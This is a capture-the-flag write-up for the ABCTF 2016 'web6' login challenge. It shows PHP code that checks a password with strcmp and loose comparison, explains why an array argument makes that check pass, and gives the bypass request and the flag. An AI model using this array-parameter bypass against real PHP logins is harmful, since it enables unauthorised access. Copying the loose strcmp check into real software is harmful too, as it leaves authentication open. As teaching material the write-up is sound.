Information#
Version#
| By | Version | Comment |
|---|---|---|
| noraj | 1.0 | Creation |
CTF#
- Name : ABCTF 2016
- Website : http://abctf.xyz/
- Type : Online
- Format : Jeopardy - Student
- CTF Time : link
Description#
If you could bypass the login you could get the flag. Link [this]:http://yrmyzscnvh.abctf.xyz/web6/
Hint: Some ways of comparing two strings are very insecure.
Solution#
- Look at page source code
- See the comment:
source.txt - So go to http://yrmyzscnvh.abctf.xyz/web6/source.txt and see the server side source code:
<?php
$FLAGWEB6 = (file_get_contents("flag.txt"));
$PASSWORD = (file_get_contents("flag.txt")); //haha
if(isset($_GET['password'])){
if(strcmp($PASSWORD, $_GET['password']) == 0){
$success = true;
}
else{
$success = false;
}
}
else {
$success = false;
}
?>- The vulnerability come from the usage of strcmp php function. Normally return 0 if two strings are equals. But if one of the two operators is not a string some weird behaviour can happen. For example if you compare a string and an array it returns NULL + PHP Warning:
strcmp("foo", array()) => NULL + PHP Warning
strcmp("foo", new stdClass) => NULL + PHP Warning- So we can bypass
if(strcmp($PASSWORD, $_GET['password']) == 0)and change it toif(NULL == 0) - And thanks to PHP native weakness
NULL == 0returnTrue. More details - So now we just have to forge a GET request giving an array:
http://yrmyzscnvh.abctf.xyz/web6/?password[]="". - Why? What is that? Transforming
?password=valueto?password[]=valuewill pass an array instead of a simple value so?password[]=""will give an empty array. - Flag is
abctf{always_know_whats_going_on}